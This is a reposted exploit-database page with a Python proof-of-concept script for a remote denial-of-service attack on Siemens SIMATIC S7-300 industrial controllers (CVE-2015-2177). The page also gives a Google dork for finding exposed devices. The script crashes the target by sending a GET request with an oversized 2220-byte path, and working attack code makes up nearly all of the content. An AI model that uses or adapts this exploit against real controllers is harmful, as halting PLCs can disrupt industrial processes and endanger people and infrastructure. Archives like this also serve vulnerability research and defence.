Siemens SIMATIC S7-300 CPU - Remote Denial of Service
|
来源:vfocus.net 作者:t4rkd3vilz 发布时间:2018-05-31
|
|
# Exploit Title: Siemens SIMATIC S7-300 CPU - Remote Denial Of Service # Google Dork: inurl:/Portal/Portal.mwsl # Date: 2018-05-30 # Exploit Author: t4rkd3vilz # Vendor Homepage: https://www.siemens.com/ # Version: SIMATIC S7-300 CPU family: all versions. # Tested on: Kali Linux # CVE: CVE-2015-2177 #!/usr/bin/python import socket target_address="TargetIP" target_port=80 buffer = "GET " + "\x42" * 2220 + " HTTP/1.1\r\n\r\n" sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=sock.connect((target_address,target_port)) sock.send(buffer) sock.close()
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|